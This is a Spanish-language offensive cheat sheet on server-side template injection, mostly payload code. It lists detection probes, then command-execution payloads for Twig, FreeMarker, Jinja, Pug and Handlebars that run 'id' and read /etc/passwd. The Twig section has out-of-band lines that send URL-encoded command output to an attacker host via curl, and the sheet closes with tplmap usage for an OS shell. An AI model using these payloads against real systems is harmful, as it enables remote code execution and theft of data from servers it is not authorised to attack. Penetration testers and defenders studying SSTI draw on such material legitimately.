Template engines
Template engine
Lenguaje
Server / client side
Identificación general de SSTI
Copiar # payloads general
{1234*2}
{1234+1234}
%{1234*2}
%{1234+1234}
<%= 1234*2 %>
<%= 1234+1234 %>
${1234*2}
${1234+1234}
{{1234*2}}
{{1234+1234}}
#{1234*2}
#{1234+1234}
@{1234*2}
@{1234+1234}
@(1234*2)
@(1234+1234)
# identificación
2468
2,468
2.468
<2468>
# payloads error
${{<%[%'"}}%\.
<%= foobar %> Arbol de decisión para la identificación del motor de plantilla
Twig
Identificación general.
Copiar {{1234*'2'}}
2468
{{-2468-}}
2468 Payloads generales.
Copiar {{1234*2}}
{{1234*'2'}}
{{1234+1234}}
{{1234+'1234'}}
{{-2468-}}
{{[0]|reduce('system','id')}}
{{[0]|reduce('passthru','id')}}
{{[0]|reduce('system','cat /etc/passwd')}}
{{[0]|reduce('passthru','cat /etc/passwd')}}
{{['id']|filter('system')}}
{{['id']|filter('passthru')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat /etc/passwd']|filter('passthru')}}
{{['id']|map('system')|join}}
{{['id']|map('passthru')}}
{{['cat /etc/passwd']|map('system')|join}}
{{['cat /etc/passwd']|map('passthru')|join}} Out-of-band (OOB)
Habilitación de servidor HTTP.
Copiar python -m SimpleHTTPServer <port>
python3 -m http.server <port> Identificación de SSTI out of bound (blind).
Copiar {{[0]|reduce('system','curl http://<attacker-IP-address>/oob')}} Ejecución de comandos.
Copiar {% set output %}
{{[0]|reduce('system','id')}}
{% endset %}
{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://<attacker-IP-address>/?oob=' ~ exfil)}} Lectura de archivos.
Copiar {% set output %}
{{[0]|reduce('system','cat /etc/passwd')}}
{% endset %}
{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://<attacker-IP-address>/?oob=' ~ exfil)}} Apache FreeMarker
Identificación general.
Copiar ${1234*2}
2,468
2.468
Copiar ${1234*2}
${1234+1234}
${"freemarker.template.utility.Execute"?new()("id")}
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")} Jinja
Identificación general.
Copiar {{"2468"*3}}
246824682468
Copiar {{1234*2}}
{{1234+1234}}
{{config|pprint}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("cat /etc/passwd").read()}}{%endif%}{% endfor %} Pug / Jade
Identificación general.
Copiar #{1234*2}
#{1234*'2'}
#{1234+1234}
#{global.process.mainModule.require('child_process').spawnSync('id').stdout}
#{global.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} Handlebars
Copiar {{#each (readdir "/etc")}}
{{this}}
{{/each}}
{{read "/etc/passwd"}} Herramientas automatizadas
Tplmap
Instalación.
Copiar git clone https://github.com/epinna/tplmap.git
cd tplmap
pip install virtualenv
virtualenv -p python2 virtualenv-tplmap
source virtualenv-tplmap/bin/activate
pip install -r requirements.txt
./tplmap.py Utilización de herramienta.
Copiar # Método GET
./tplmap.py -u "http://<target>/index.php?<parameter>=value*"
# Método POST
./tplmap.py -u "http://<target>" -d <parameter>="value*"
# Ejecución de comandos
--os-cmd=<command>
# Shell interactiva
--os-shell Última actualización hace 2 meses
